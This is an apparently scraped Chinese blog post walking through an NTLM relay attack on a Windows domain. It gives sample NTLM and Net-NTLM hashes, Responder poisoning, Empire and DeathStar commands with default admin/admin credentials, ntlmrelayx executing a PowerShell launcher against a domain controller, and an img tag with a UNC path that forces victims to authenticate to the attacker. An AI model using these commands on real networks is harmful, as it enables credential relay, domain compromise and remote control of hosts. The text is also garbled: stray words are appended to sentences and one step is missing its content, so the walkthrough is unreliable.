內網滲透中的NTLM-Hash Relay

時間 2019-11-19

標籤滲透 ntlm hash relay 简体版

原文原文鏈接

基礎知識

NTLN和Net-NTLM

一、NTLM(V1/V2)的hash是存放在安全帳戶管理(SAM)數據庫以及域控的NTDS.dit數據庫中，獲取該Hash值能夠直接進行PtH攻擊，我博客中前文也有介紹過。
二、Net-NTLM(V1/V2)的hash值是基於用戶的NT的hash值通過必定的算法產生的。html

#NTLM-Hash
aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42  前面是LMhash後面是NT的Hash
#Net-NTLM-Hash
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030

NTLM認證攻擊的原理

說到底，在使用一些服務的過程當中，須要帶有windows的自身的認證信息，其實就是Net-NTLM的Hash，而這些東西你可使用像Responder或者Inveigh這些工具得到。而後你獲取了這個Net-NTLM的Hash，就能夠轉給真正的驗證服務器去驗證，從而做爲攻擊者的你就能夠經過真實的服務器的身份驗證，這種攻擊方式就稱做NTLM中繼攻擊。python

攻擊場景

控制受害者訪問一個站點（不存在的最好），你做爲攻擊者對此做出應答，認證信息會傳到你的攻擊者的機器上，你對此再作轉發，去真實的服務器上認證，便可獲取真正服務器的權限。git

攻擊流程

攻擊準備

Kali（Ubuntu）攻擊筆記本一臺
Windows客戶端一臺
Windows服務器一臺

攻擊工具

Responder，下載地址：https://github.com/SpiderLabs/Responder
Empire，下載地址：https://github.com/EmpireProject/Empire
Deathstar，下載地址：https://github.com/byt3bl33d3r/DeathStar
ntlmrelayx，下載地址：https://github.com/CoreSecurity/impacket，安裝配置：https://hausec.com/how-to-set-up-ntlmrelayx-py/

啓動Empire

一、啓動Empire的RestFUL-API

sudo python empire --rest --username admin --password admin
github

二、而後建立powershell腳本

launcher powershell DeathStar

三、打開DeathStar

root@kali:~/DeathStar# ./DeathStar.py --listener-ip kali_ip -t 100 -u admin -p admin

四、開啓中繼

ntlmrelayx.py -t target_ip(例如域控) -c 'powershell腳本生成的內容'

五、打開Responder.py

先修改文件（Responder.py）：

而後算法

python Responder.py -I eth0 -r -d –v

六、結果

能夠看出中繼是認證成功的，可是rpc調用失敗了，由於權限不夠。shell

擴展-使用CSRF控制客戶端去請求：

在瀏覽器沙箱不斷髮展的幾天，不少僞協議或者文件協議的訪問方式都已經被禁止了，可是SMB依然能夠數據庫

<img src='\\WIN-8JQH4CQEJIR\User\img\1.jpg'>

這樣就能夠實現控制的訪問。windows

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。